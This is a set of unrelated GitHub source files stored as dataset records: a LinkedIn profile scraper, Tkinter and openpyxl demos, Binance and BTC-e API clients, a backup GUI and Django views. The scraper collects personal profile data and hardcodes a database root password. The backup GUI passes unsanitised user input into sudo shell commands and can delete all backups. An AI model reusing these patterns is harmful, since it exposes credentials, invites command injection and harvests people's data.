sep='\\t')\n\ndef convert(words):\n tokens = words.lower()\n tokens = tokens.replace(',', ' ')\n tokens = decimal_pattern.sub(' <num> ', tokens)\n stemmed_tokens = []\n for token in tokens.split():\n if token.isdecimal():\n stemmed_tokens.append('<num>')\n else:\n stemmed_tokens.append(ps.stem(token))\n return stemmed_tokens\n\nis_header = True\nfor line in fileinput.input(files='-'):\n if is_header:\n is_header = False\n continue\n line = line.strip()\n records = line.split('\\t')\n path = records[0]\n name1 = records[1]\n name2 = records[2]\n scope = records[3]\n words1 = records[4]\n words2 = records[5]\n if name1 == name2:\n cossim = 1\n else:\n v1 = model.infer_vector(convert(words1))\n v2 = model.infer_vector(convert(words2))\n cossim = np.dot(v1,v2)/(np.linalg.norm(v1)*np.linalg.norm(v2))\n print(path, name1, name2, scope, cossim, sep='\\t')\n","repo_name":"amanhirohisa/cvpfinder","sub_path":"lib/compute_semantic_similarity.py","file_name":"compute_semantic_similarity.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71995365200","text":"import MySQLdb\nfrom juicer.utils import *\nfrom juicer.items import *\nhandle_httpstatus_list = [404, 302, 303]\nclass Linkedin30crawl(JuicerSpider):\n name = 'linkedin_flag_browse'\n\n def __init__(self, *args, **kwargs):\n super(Linkedin30crawl, self).__init__(*args, **kwargs)\n self.con = MySQLdb.connect(db = 'FACEBOOK', \\\n host = 'localhost', charset=\"utf8\", use_unicode=True, \\\n user = 'root', passwd = 'hdrn59!')\n self.cur = self.con.cursor()\n self.field = kwargs.get('field', 'clean_url')\n get_query_param = \"\"\n if self.field == 'url':\n get_query_param = \"select sk, url, meta_data from linkedin_crawl30 where crawl_status=0 limit 500\"\n else: get_query_param = \"select sk, url, meta_data from linkedin_crawl30 where flag = 'True' and crawl_type = '' limit 10000\"\n #get_query_param = \"select sk, url, meta_data from linkedin_crawl30 where sk = '11930ca31e4678bdd4e3710c3b455fc9'\"\n self.cur.execute(get_query_param)\n self.profiles_list = [i for i in self.cur.fetchall()]\n\n def start_requests(self):\n requests = []\n for i in self.profiles_list:\n url = i[1]\n query1 = \"\"\n if self.field == 'url':\n query1 = \"update linkedin_crawl30 set crawl_status=1 where sk ='%s'\"%(i[0])\n else: query1 = \"update linkedin_crawl30 set crawl_type ='crawled' where sk ='%s'\"%(i[0])\n self.cur.execute(query1)\n request = Request(url, self.parse, meta={'sk':i[0], 'meta_data':i[2]}, dont_filter=True)\n requests.extend(request)\n return requests\n\n def parse(self, response):\n sk = response.meta['sk']\n sel = Selector(response)\n if self.field == 'url':\n valid = 'False'\n if response.status== 200 and not 'your request could not be completed' in response.body.lower():\n valid = 'True'\n query = \"update linkedin_crawl30 set flag= '%s' where sk ='%s'\"%(valid,sk)\n self.cur.execute(query)\n else:\n first_name = extract_data(sel,'//div[@class=\"member-info\"]/h1//span[@class=\"given-name\"]/text()')\n last_name = extract_data(sel, '//div[@class=\"member-info\"]/h1//span[@class=\"family-name\"]/text()')\n name = (\"%s%s%s\"%(first_name,' ', last_name)).strip()\n locality = extract_data(sel, '//div[@class=\"member-info\"]/p//span[@class=\"locality\"]/text()')\n image = extract_data(sel, '//div[@class=\"member-photo\"]/img/@src')\n if 'icon_no_photo' in image: image = ''\n mark = extract_data(sel, '//div[@class=\"member-photo\"]/span[@class=\"mark\"]/@class')\n member_url = extract_data(sel, '//div[@class=\"member-info\"]/h1/a[@class=\"url\"]/@href')\n linke_m = Linkedin()\n if first_name:\n linke_m['sk'] = normalize(sk)\n linke_m['name'] = normalize(name)\n linke_m['first_name'] = normalize(first_name)\n linke_m['last_name'] = normalize(last_name)\n linke_m['locality'] = normalize(locality)\n linke_m['image'] = normalize(image)\n linke_m['mark'] = normalize(mark)\n linke_m['member_url'] = normalize(member_url)\n linke_m['url'] = normalize(response.url)\n yield linke_m\n position_nodes = get_nodes(sel, '//div[@class=\"member-info\"]/p//span[@class=\"title\"]')\n if position_nodes:\n for posn in position_nodes:\n title = extract_data(posn, './b[not(@*)]/text()')\n organization = extract_data(posn, './/b[@class=\"org\"]/text()')\n if title:\n linke_p = Linkedinpostions()\n linke_p['sk'] = md5(\"%s%s%s\"%(sk, title, organization))\n linke_p['profile_sk'] = normalize(sk)\n linke_p['title'] = normalize(title)\n linke_p['organization'] = normalize(organization)\n yield linke_p\n viewer_nodes = get_nodes(sel, '//ul[@class=\"has-names\"]/li[@class=\"vcard\"]')\n if viewer_nodes:\n for node in viewer_nodes:\n ndoe_url = extract_data(node,'./span[a]/a/@href')\n node_txt = extract_data(node, './span[a]/a/text()')\n node_headline = extract_data(node,'./span[@class=\"headline\"]//text()').strip().strip(',').strip()\n if node_txt:\n linke_v = Linkedinviewers()\n linke_v['sk'] = md5(\"%s%s%s\"%(sk, ndoe_url, node_headline))\n linke_v['profile_sk'] = normalize(sk)\n linke_v['viewer_url'] = normalize(ndoe_url)\n linke_v['viewer_name'] = normalize(node_txt)\n linke_v['viewer_headline'] = normalize(node_headline)\n yield linke_v\n\n\n\n","repo_name":"headrun/pi","sub_path":"PIFramework/juicer/spiders/linkedin_flag_browse.py","file_name":"linkedin_flag_browse.py","file_ext":"py","file_size_in_byte":5795,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"7110041862","text":"import tkinter as tk\nimport time\n\nwindow = tk.Tk()\nwindow.title(\"a\")\nwindow.geometry('800x500')\n\ncanvas = tk.Canvas(window, width=500, height=300, bg='grey')\ncanvas.place(x=0, y=0)\n\ncanvas.create_rectangle(5,5,105,25,outline='blue',width=1)\n\ndef add_some(prec):\n canvas.create_rectangle(5,5,1.05*int(prec),25,width=0,fill='red')\n\ndef move_r():\n global e\n e=en_b.get()\n\nen_b=tk.Entry(window)\nen_b.place(y=300,x=0)\n\ne=tk.StringVar()\n\n\n\nbtn=tk.Button(window,width=20,command=lambda:add_some(e),text=\"add_some\")\nbtn.place(x=0,y=350)\n\nbtn_1=tk.Button(window,width=20,command=move_r,text=\"get\")\nbtn_1.place(x=0,y=380)\n\n\nwindow.mainloop()\n","repo_name":"Erica-Iris/Python","sub_path":"WNACG_Downer/UI_test.py","file_name":"UI_test.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9210350749","text":"from datetime import datetime\nfrom time import sleep\nimport traceback\nfrom binance.spot import Spot\nfrom binance.error import ClientError as BinanceError\nimport config \nimport cloud_logger\n\nDEPTH_LIMIT = 5000\nREQUEST_ID_SUFFIXE = '@snapshot_depth@5000'\nSECONDS_BETWEEN_PAIR = 15\n\n\nclass BookSnapshot:\n client = None\n msg_callback = None\n\n\n def __init__(self,callback):\n self.client = Spot()\n self.msg_callback = callback\n\n\n def get_all_depths(self):\n for pair in config.pairs:\n try:\n depth = self.__get_enriched_depth__(pair)\n self.msg_callback(depth)\n except BinanceError as err:\n self.handle_binance_error(err)\n continue\n except Exception:\n log_body = {'message': traceback.format_exc()}\n cloud_logger.write_log(log_body, severity='ERROR')\n\n sleep(SECONDS_BETWEEN_PAIR)\n\n\n def __get_enriched_depth__(self, pair):\n depth = self.client.depth(pair.upper(), limit=DEPTH_LIMIT)\n depth['localtimestamp'] = datetime.now().timestamp()\n depth['request_name'] = f'{pair.upper()}{REQUEST_ID_SUFFIXE}'\n return depth\n\n\n def handle_binance_error(err: BinanceError):\n log_body = {'message': str(err), 'status_code': err.status_code}\n cloud_logger.write_log(log_body, severity='WARNING')\n if(err.status_code != 400): raise err\n\n \n","repo_name":"olivierpicard/brushed-charts","sub_path":"services/binance_rest_fetch/book_snapshot.py","file_name":"book_snapshot.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72395637843","text":"from openpyxl import load_workbook\n\n# get_column_letter function => will give us the column title out of the column index\nfrom openpyxl.utils import get_column_letter\n\n# Getting the excel file\nwb = load_workbook(\"test2.xlsx\")\nsheet=wb.active\n\n\"\"\"\nWith Excel:\n- First row has the index value of 1\n- First column also has the index value of 1\n\"\"\"\n# Looping through worksheet cells (access multiple cells):\n# we have 5 rows: 1 to 6 in python range function\n\n# (other programming languages) x = \"A\" + 1 => A1\n\n# for (i=1; i<6; i++) :-)\nfor row in range(1, 6):\n # row=1, 2, 3, 4, 5\n # each row has two columns:\n \"\"\"\n Notice here we need to get:\n 1) A1, B1\n 2) A2, B2\n 3) A3, B3\n and so on...\n \"\"\"\n for column in range(1,3): # 1 and 2 columns\n # column=1 and column=2 \n # print(sheet['A1'].value, sheet['B1'].value)\n \n # print(sheet[row,column].value)\n # Error: TypeError: expected string or bytes-like object\n\n \"\"\"\n we can use a function from \"openpyxl\"\n called get_column_letter\n this function needs to be imported\n \"\"\"\n letter = get_column_letter(column) # column=1 => A, column=2 => B\n \n # print(sheet[letter+row].value, sheet[letter+row].value)\n # Error: TypeError: can only concatenate str (not \"int\") to str \n print(sheet[letter+str(row)].value)\n\n\n","repo_name":"anmarjarjees/py-code","sub_path":"week14/word-excel/py-excel3.py","file_name":"py-excel3.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25175215771","text":"from collections import namedtuple\nimport hashlib\nimport hmac\nimport warnings\n\ntry:\n from urllib import urlencode\nexcept ImportError:\n from urllib.parse import urlencode\n\nfrom . import keyhandler\nfrom . import public\n\n\nclass InvalidNonceException(Exception):\n def __init__(self, method, expectedNonce, actualNonce):\n Exception.__init__(self)\n self.method = method\n self.expectedNonce = expectedNonce\n self.actualNonce = actualNonce\n\n def __str__(self):\n return \"Expected a nonce greater than %d\" % self.expectedNonce\n\n\nclass InvalidSortOrderException(Exception):\n \"\"\" Exception thrown when an invalid sort order is passed \"\"\"\n pass\n\n\nclass TradeAccountInfo(object):\n \"\"\"An instance of this class will be returned by\n a successful call to TradeAPI.getInfo.\"\"\"\n\n def __init__(self, info):\n self.funds = info.get(u'funds')\n self.open_orders = info.get(u'open_orders')\n self.server_time = info.get(u'server_time')\n self.transaction_count = info.get(u'transaction_count')\n rights = info.get(u'rights')\n self.info_rights = (rights.get(u'info') == 1)\n self.withdraw_rights = (rights.get(u'withdraw') == 1)\n self.trade_rights = (rights.get(u'trade') == 1)\n\n\nTransactionHistoryItem = namedtuple(\"TransactionHistoryItem\",\n [\"transaction_id\", \"type\", \"amount\", \"currency\", \"desc\", \"status\", \"timestamp\"])\n\n\nTradeHistoryItem = namedtuple(\"TradeHistoryItem\",\n [\"transaction_id\", \"pair\", \"type\", \"amount\", \"rate\", \"order_id\", \"is_your_order\", \"timestamp\"])\n\n\nOrderItem = namedtuple(\"OrderItem\",\n [\"order_id\", \"pair\", \"type\", \"amount\", \"rate\", \"timestamp_created\", \"status\"])\n\n\nTradeResult = namedtuple(\"TradeResult\",\n [\"received\", \"remains\", \"order_id\", \"funds\"])\n\n\nCancelOrderResult = namedtuple(\"CancelOrderResult\",\n [\"order_id\", \"funds\"])\n\n\ndef setHistoryParams(params, from_number, count_number, from_id, end_id,\n order, since, end):\n if from_number is not None:\n params[\"from\"] = \"%d\" % from_number\n if count_number is not None:\n params[\"count\"] = \"%d\" % count_number\n if from_id is not None:\n params[\"from_id\"] = \"%d\" % from_id\n if end_id is not None:\n params[\"end_id\"] = \"%d\" % end_id\n if order is not None:\n if order not in (\"ASC\", \"DESC\"):\n raise InvalidSortOrderException(\"Unexpected order parameter: %r\" % order)\n params[\"order\"] = order\n if since is not None:\n params[\"since\"] = \"%d\" % since\n if end is not None:\n params[\"end\"] = \"%d\" % end\n\n\nclass TradeAPI(object):\n def __init__(self, key, handler, connection):\n self.key = key\n self.handler = handler\n self.connection = connection\n self.apiInfo = public.APIInfo(self.connection)\n self.raiseIfInvalidNonce = True\n\n if not isinstance(self.handler, keyhandler.AbstractKeyHandler):\n raise TypeError(\"The handler argument must be a\"\n \" keyhandler.AbstractKeyHandler, such as\"\n \" keyhandler.KeyHandler\")\n\n # We depend on the key handler for the secret\n self.secret = handler.getSecret(key)\n\n def _post(self, params, allowNonceRetry=False):\n params[\"nonce\"] = self.handler.getNextNonce(self.key)\n encoded_params = urlencode(params)\n\n # Hash the params string to produce the Sign header value\n H = hmac.new(self.secret.encode('utf-8'), digestmod=hashlib.sha512)\n H.update(encoded_params.encode('utf-8'))\n sign = H.hexdigest()\n\n headers = {\"Key\": self.key, \"Sign\": sign}\n result = self.connection.makeJSONRequest(\"/tapi\", headers, encoded_params)\n\n success = result.get(u'success')\n if not success:\n err_message = result.get(u'error')\n method = params.get(\"method\", \"[uknown method]\")\n\n if \"invalid nonce\" in err_message:\n # If the nonce is out of sync, make one attempt to update to\n # the correct nonce. This sometimes happens if a bot crashes\n # and the nonce file doesn't get saved, so it's reasonable to\n # attempt a correction. If multiple threads/processes are\n # attempting to use the same key, this mechanism will\n # eventually fail and the InvalidNonce will be emitted so that\n # you'll end up here reading this comment. :)\n\n # The assumption is that the invalid nonce message looks like\n # \"invalid nonce parameter; on key:4, you sent:3\"\n s = err_message.split(\",\")\n expected = int(s[-2].split(\":\")[1].strip(\"'\"))\n actual = int(s[-1].split(\":\")[1].strip(\"'\"))\n if self.raiseIfInvalidNonce and not allowNonceRetry:\n raise InvalidNonceException(method, expected, actual)\n\n warnings.warn(\"The nonce in the key file is out of date;\"\n \" attempting to correct.\")\n self.handler.setNextNonce(self.key, expected + 1000)\n return self._post(params, True)\n elif \"no orders\" in err_message and method == \"ActiveOrders\":\n # ActiveOrders returns failure if there are no orders;\n # intercept this and return an empty dict.\n return {}\n elif \"no trades\" in err_message and method == \"TradeHistory\":\n # TradeHistory returns failure if there are no trades;\n # intercept this and return an empty dict.\n return {}\n\n raise Exception(\"%s call failed with error: %s\"\n % (method, err_message))\n\n if u'return' not in result:\n raise Exception(\"Response does not contain a 'return' item.\")\n\n return result.get(u'return')\n\n def getInfo(self):\n params = {\"method\": \"getInfo\"}\n return TradeAccountInfo(self._post(params))\n\n def transHistory(self, from_number=None, count_number=None,\n from_id=None, end_id=None, order=\"DESC\",\n since=None, end=None):\n\n params = {\"method\": \"TransHistory\"}\n\n setHistoryParams(params, from_number, count_number, from_id, end_id,\n order, since, end)\n\n orders = self._post(params)\n result = []\n for k, v in orders.items():\n result.append(TransactionHistoryItem(int(k), **v))\n\n # We have to sort items here because the API returns a dict\n if \"ASC\" == order:\n result.sort(key=lambda a: a.transaction_id, reverse=False)\n elif \"DESC\" == order:\n result.sort(key=lambda a: a.transaction_id, reverse=True)\n\n return result\n\n def tradeHistory(self, from_number=None, count_number=None,\n from_id=None, end_id=None, order=None,\n since=None, end=None, pair=None):\n\n params = {\"method\": \"TradeHistory\"}\n\n setHistoryParams(params, from_number, count_number, from_id, end_id,\n order, since, end)\n\n if pair is not None:\n self.apiInfo.validate_pair(pair)\n params[\"pair\"] = pair\n\n orders = list(self._post(params).items())\n orders.sort(reverse=order != \"ASC\")\n result = []\n for k, v in orders:\n result.append(TradeHistoryItem(int(k), **v))\n\n return result\n\n def activeOrders(self, pair=None):\n\n params = {\"method\": \"ActiveOrders\"}\n\n if pair is not None:\n pair_info = self.apiInfo.validate_pair(pair)\n params[\"pair\"] = pair\n\n orders = self._post(params)\n result = []\n for k, v in orders.items():\n result.append(OrderItem(int(k), **v))\n\n return result\n\n def trade(self, pair, trade_type, rate, amount):\n pair_info = self.apiInfo.get_pair_info(pair)\n pair_info.validate_order(trade_type, rate, amount)\n params = {\"method\": \"Trade\",\n \"pair\": pair,\n \"type\": trade_type,\n \"rate\": pair_info.format_currency(rate),\n \"amount\": pair_info.format_currency(amount)}\n\n return TradeResult(**self._post(params))\n\n def cancelOrder(self, order_id):\n params = {\"method\": \"CancelOrder\",\n \"order_id\": order_id}\n return CancelOrderResult(**self._post(params))\n","repo_name":"CodeReclaimers/btce-api","sub_path":"btceapi/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":8452,"program_lang":"python","lang":"en","doc_type":"code","stars":191,"dataset":"github-code","pt":"3"} +{"seq_id":"4375950076","text":"### Importations ###\n\nfrom tkinter import *\nimport os\n\n### Variables ###\n\nfen = Tk()\nfen.title(\"Backup.py\")\ncan = Canvas(fen, height = 200, width = 160)\ntxt1 = Label(can, text = \"Nom :\")\ntxt2 = Label(can, text = \"Chemin : \")\ntxt3 = Label(can, text = \"Nom :\")\ntxt4 = Label(can, text = \"Nom :\")\ntxt5 = Label(can, text = \"Nom :\")\n\nentr1_var = StringVar()\nentr2_var = StringVar()\nentr3_var = StringVar()\nentr4_var = StringVar()\nentr5_var = StringVar()\n\nentr1 = Entry(can, textvariable = entr1_var)\nentr2 = Entry(can, textvariable = entr2_var)\nentr3 = Entry(can, textvariable = entr3_var)\nentr4 = Entry(can, textvariable = entr4_var)\nentr5 = Entry(can, textvariable = entr5_var)\nscrollbar = Scrollbar(can)\n\nliste_bash = Listbox(can, xscrollcommand=scrollbar.set, width = 30)\n\n\n\n### Fonctions\n\ndef extract():\n\tglobal entr4_var\n\tentr4_var = entr4_var.get()\n\tos.system(\"sudo ./backup.sh extract %s\" %(entr4_var))\n\ndef save():\n\tglobal entr1_var, entr2_var\n\tentr1_var = entr1_var.get()\n\tentr2_var = entr2_var.get()\n\tos.system(\"sudo ./backup.sh save %s %s\" %(entr1_var, entr2_var))\n\ndef delete():\n\tglobal entr3_var\n\tentr3_var = entr3_var.get()\n\tos.system(\"sudo ./backup.sh delete %s\" %(entr3_var))\n\t\ndef restore():\n\tglobal entr5_var\n\tentr5_var = entr5_var.get()\n\tos.system(\"sudo ./backup.sh restore %s\" %(entr5_var))\n\ndef deleteAll():\n\tos.system(\"yes `echo YES` | sudo ./backup.sh delete all\")\n\ndef listappend():\n\tos.system(\"sudo ./backup.sh list>file.txt\")\n\t\n\n### Buttons ###\n\nboutton_Save = Button(can, text = \"Save\", command = save)\nboutton_Delete = Button(can, text = \"Delete\", command = delete)\nboutton_Delete_all = Button(can, text = \"Delete All Backups\", command = deleteAll)\nboutton_Extract = Button(can, text = \"Extract\", command = extract)\nboutton_Restore = Button(can, text = \"Restore\", command = restore)\n\n### Positions ###\nlistappend()\nfichier = open('file.txt','r')\n\nfor lignes in fichier:\n\tliste_bash.insert(1, lignes)\n\n\ntxt1.grid(row = 1, column = 1)\nentr1.grid(row = 1, column = 2)\n\ntxt2.grid(row = 1, column = 3)\nentr2.grid(row = 1 , column = 4)\nboutton_Save.grid(row = 1, column = 5)\n\ntxt3.grid(row = 2, column = 3)\nentr3.grid(row = 2, column = 4)\nboutton_Delete.grid(row = 2, column = 5)\n\ntxt4.grid(row = 3, column = 3)\nentr4.grid(row=3,column=4)\nboutton_Extract.grid(row = 3, column = 5)\n\ntxt5.grid(row = 4, column = 3)\nentr5.grid(row=4, column = 4)\nboutton_Restore.grid(row=4, column=5)\n\nboutton_Delete_all.grid(row = 5, column = 2)\nliste_bash.grid(row = 5, column=3)\nscrollbar.grid(column = 3, row=6)\nscrollbar.config(orient=HORIZONTAL, command=liste_bash.xview)\n\ncan.grid(row = 10, column = 5, rowspan = 3, padx=10, pady=10)\nfen.mainloop()\n","repo_name":"antoineDurand82/Projet_Infra_B1A","sub_path":"Backup.py","file_name":"Backup.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27091733175","text":"import pygame\nfrom scripts.ingame import assets, global_, setting, tank\nfrom assets import Assets\nfrom global_ import Global\nfrom setting import Setting\nfrom tank import Heavy_Tank, Light_Tank, SPG, Tank_Destroyer\n\ndef init():\n\tpygame.init()\n\tGlobal.init()\n\tSetting.init()\n\nif __name__ == '__main__':\n\tinit()\n\n\tscreen = pygame.display.set_mode(Setting.Window.SCREEN_SIZE)\n\n\ttank = Light_Tank('Tank 1', pygame.Color('BLUE'), (100, 100))\n\ttank2 = Heavy_Tank('Tank 2', pygame.Color('RED'), (200, 100))\n\tGlobal.add_wall(Assets.Map.MAP1)\n\tGlobal.add_boundary()\n\tGlobal.game_quit = False\n\n\twhile True:\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT:\n\t\t\t\tGlobal.game_quit = True\n\t\t\t\tbreak\n\t\tif Global.game_quit:\n\t\t\tbreak\n\t\tscreen.fill(Setting.Environment.BACKGROUND_COLOR)\n\t\tpressed = pygame.key.get_pressed()\n\t\ttank.check_actions(pressed)\n\t\tGlobal.update()\n\t\tGlobal.draw(screen)\n\t\tpygame.display.flip()\n\t\tpygame.time.wait(Setting.Window.MSPF)\n\tpygame.display.quit()\n","repo_name":"alm818/battle_tank_multiplayer","sub_path":"test_pygame.py","file_name":"test_pygame.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43811600243","text":"T = int(input())\n\nfor t in range(1, T+1) :\n XY = int(input())\n list1 = [[0] * XY for i in range(XY)]\n x, y = 0, -1\n dx, dy = 0, 1\n\n number = 1\n\n for i in range(XY * XY) :\n if not (0<= x + dx < XY and 0 <= y + dy < XY and list1[x + dx][y + dy] == 0) : # 범위 안에 없거나, 이미 값이 변화했으면\n if abs(dy) == 1 :\n dx, dy = dy, dx\n else : # abs(dx) == 1\n dx, dy = dy, -dx\n x += dx # 위치 이동\n y += dy # 위치 이동\n list1[x][y] = number\n\n number += 1\n print('#', t, sep='')\n for x in range(XY) :\n print(*list1[x])\n","repo_name":"KDT2-Algorithm-study/Algorithm-study","sub_path":"SWEA/1954/1954_정윤원.py","file_name":"1954_정윤원.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"ko","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"37861642966","text":"from PyQt4 import QtCore, QtGui\r\n\r\n\r\nclass Item:\r\n def __init__(self, name, surname, birth, mail, phone):\r\n self.name = name\r\n self.surname = surname\r\n self.birth = birth\r\n self.mail = mail\r\n self.phone = phone\r\n\r\n def __str__(self):\r\n return \"------------Item------------\" \\\r\n \"\\nName - \"+self.name + \\\r\n \"\\nSurname - \"+self.surname + \\\r\n \"\\nBirth - \"+self.birth + \\\r\n \"\\nMail - \"+self.mail + \\\r\n \"\\nPhone - \"+self.phone + \"\\n\" \\\r\n \"------------End-------------\"\r\n\r\n def getList(self):\r\n return [self.name, self.surname, self.birth, self.mail, self.phone]\r\n\r\n def __len__(self):\r\n return 5\r\n\r\n\r\nclass TableModel(QtCore.QAbstractTableModel):\r\n def __init__(self, items=[], headers=[], parent=None):\r\n QtCore.QAbstractTableModel.__init__(self, parent)\r\n self._items = items\r\n self._headers = headers\r\n\r\n def rowCount(self, parent=None, *args, **kwargs):\r\n return len(self._items)\r\n\r\n def columnCount(self, parent=None, *args, **kwargs):\r\n return 5\r\n\r\n def flags(self, index):\r\n return QtCore.Qt.ItemIsEditable | QtCore.Qt.ItemIsSelectable | QtCore.Qt.ItemIsEnabled\r\n\r\n def data(self, index, role):\r\n row = index.row()\r\n column = index.column()\r\n if role == QtCore.Qt.EditRole:\r\n return self._items[row][column]\r\n\r\n if role == QtCore.Qt.ToolTipRole:\r\n return self._items[row][column]\r\n\r\n if role == QtCore.Qt.DisplayRole:\r\n value = self._items[row][column]\r\n return value\r\n\r\n def setData(self, index, value, role=QtCore.Qt.EditRole):\r\n if role == QtCore.Qt.EditRole:\r\n row = index.row()\r\n column = index.column()\r\n self._items[row][column] = value\r\n self.dataChanged.emit(index, index)\r\n return True\r\n\r\n def headerData(self, section, orientation, role):\r\n if role == QtCore.Qt.DisplayRole:\r\n if orientation == QtCore.Qt.Horizontal:\r\n return self._headers[section]\r\n else:\r\n return section + 1\r\n\r\n def insertRows(self, position, rows, parent=QtCore.QModelIndex()):\r\n self.beginInsertRows(QtCore.QModelIndex(), position, position + rows - 1)\r\n for i in range(rows):\r\n self._items.insert(position, Item(\"Ihor\", \"Paliy\", \"1997-06-06\", \"darkfree97@gmail.com\", \"+380977456929\").getList())\r\n self.endInsertRows()\r\n return True\r\n\r\n def removeRows(self, position, rows=-1, parent=QtCore.QModelIndex()):\r\n if rows == -1:\r\n rows = len(self._items)\r\n self.beginRemoveRows(QtCore.QModelIndex(), position, position + rows - 1)\r\n for i in range(rows):\r\n value = self._items[position]\r\n self._items.remove(value)\r\n self.endRemoveRows()\r\n return True\r\n\r\n def insertRow(self, item=[], parent=None, *args, **kwargs):\r\n self.beginInsertRows(QtCore.QModelIndex(), 0, 0)\r\n self._items.insert(self.rowCount(), item)\r\n self.endInsertRows()\r\n return True\r\n","repo_name":"darkfree97/python-education-rep","sub_path":"AVDLab3/Item.py","file_name":"Item.py","file_ext":"py","file_size_in_byte":3226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"7048551155","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.db.models import Min\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.shortcuts import redirect\nimport datetime as dt\nimport calendar as c\nimport json\n\nfrom zerf.models import Entry, Group\n\n@csrf_exempt\ndef redirect_view(request):\n curr_date = dt.datetime.now().strftime('%d.%m.%Y')\n response = redirect(curr_date)\n return response\n\n@csrf_exempt\ndef index(request, in_date):\n \n sel_date = dt.datetime.strptime(in_date, \"%d.%m.%Y\")\n curr_date = dt.datetime.now()\n d = []\n for i in range(c.monthrange(sel_date.year, sel_date.month)[1]):\n d.append(dt.date(sel_date.year, sel_date.month, i+1))\n \n entries = Entry.objects.all()\n start_time = []\n end_time = []\n date_entries = []\n time_diff = []\n for e in entries:\n start_time.append(e.start_time)\n end_time.append(e.end_time)\n time_diff.append(dt.datetime.combine(dt.date.today(), e.end_time) - \n dt.datetime.combine(dt.date.today(), e.start_time) )\n date_entries.append(e.date)\n\n time_agg = []\n time_agg_int = []\n day_num = []\n month_num = d[0].month\n month_name = tuple(['January', 'February', 'March', 'April', 'Mai', 'June', 'Juli', 'August', 'September', 'October', 'November', 'December'])[month_num-1]\n month_str = str(month_num + 100)[-2:]\n year_num = d[0].year\n for date in d:\n time_agg.append(dt.timedelta(hours=0))\n day_num.append(date.day)\n for i in range(len(date_entries)):\n if date == date_entries[i]:\n time_agg[-1] += time_diff[i]\n time_agg_int.append(time_agg[-1].total_seconds())\n time_agg_str = str(time_agg[-1])[:-3]\n if len(time_agg_str) == 4:\n time_agg_str = '0'+time_agg_str\n time_agg[-1] = time_agg_str\n \n time_agg_max = max(time_agg_int)\n for i in range(len(time_agg_int)):\n if time_agg_int[i] > 0:\n time_agg_int[i] /= time_agg_max\n time_agg_int[i] = int (time_agg_int[i] * 10)\n\n # calculate number of days between the 1. and the last monday before\n first_weekd = d[0].weekday()\n\n time_agg = json.dumps (time_agg)\n time_agg_int = json.dumps (time_agg_int)\n day_num = json.dumps (day_num)\n context = {'curr_date': curr_date.strftime('%d.%m.%Y'), 'date': in_date, 'year_num': year_num, 'month_name': month_name, 'month_str': month_str, 'time_agg': time_agg, 'time_agg_int': time_agg_int, 'day_num': day_num, 'first_weekd': first_weekd}\n\n return render(request, 'zerf/index.html', context)\n\n@csrf_exempt\ndef add_entry(request, in_date):\n\n in_date = dt.datetime.strptime(in_date, \"%d.%m.%Y\").date()\n curr_date = dt.datetime.now()\n sel_month = in_date.month\n sel_year = in_date.year\n day_max = c.monthrange(sel_year, sel_month)[-1]\n if sel_month > 1:\n day_max_prev_month = c.monthrange(sel_year, sel_month-1)[-1]\n else:\n day_max_prev_month = c.monthrange(sel_year-1, 12)[-1]\n \n if request.method == 'POST':\n id_val = tuple( request.POST.getlist('id') )\n starttime_val = request.POST.getlist('stname[]')\n endtime_val = request.POST.getlist('etname[]')\n group_val = request.POST.getlist('grname[]')\n desc_val = request.POST.getlist('descname[]')\n del_val = request.POST.getlist('delname[]')\n \n for i in range(len(starttime_val)):\n if id_val[i] == 'new' and del_val[i] != '1':\n b = Entry(date = in_date, start_time = starttime_val[i], end_time = endtime_val[i], \n group = Group.objects.get(task_group_name=group_val[i]), description = desc_val[i])\n b.save()\n elif id_val[i] != 'new':\n b = Entry.objects.get(id=id_val[i])\n setattr(b, 'start_time', starttime_val[i])\n setattr(b, 'end_time', endtime_val[i])\n setattr(b, 'group', Group.objects.get(task_group_name=group_val[i]))\n setattr(b, 'description', desc_val[i])\n b.save()\n if del_val[i] == '1' and id_val[i] != 'new':\n b = Entry.objects.get(id=id_val[i])\n b.delete()\n \n group_names = Group.objects.values_list('task_group_name', flat = True)\n \n ids_name = list(Entry.objects.filter(date=in_date).values_list('id', flat = True))\n start_name = list(Entry.objects.filter(date=in_date).values_list('start_time', flat = True))\n end_name = list(Entry.objects.filter(date=in_date).values_list('end_time', flat = True))\n group_name = list(Entry.objects.filter(date=in_date).values_list('group', flat = True))\n desc_name = list(Entry.objects.filter(date=in_date).values_list('description', flat = True))\n stock_len = len(start_name)\n \n for i in range(stock_len):\n start_name[i] = start_name[i].strftime(\"%H:%M\")\n end_name[i] = end_name[i].strftime(\"%H:%M\")\n group_name[i] = getattr(Group.objects.get(id=group_name[i]),'task_group_name')\n \n ids_entries = json.dumps (ids_name)\n start_entries = json.dumps (start_name)\n end_entries = json.dumps (end_name)\n group_entries = json.dumps (group_name)\n desc_entries = json.dumps (desc_name)\n\n return render(request, 'zerf/add_entry.html', \n {'curr_date': curr_date.strftime('%d.%m.%Y'), 'date': in_date.strftime('%d.%m.%Y'), 'group_names': group_names, 'stock_len': stock_len, \n 'ids_entries': ids_entries, 'start_entries': start_entries, 'end_entries': end_entries, \n 'group_entries': group_entries, 'desc_entries': desc_entries, 'day_max': day_max, 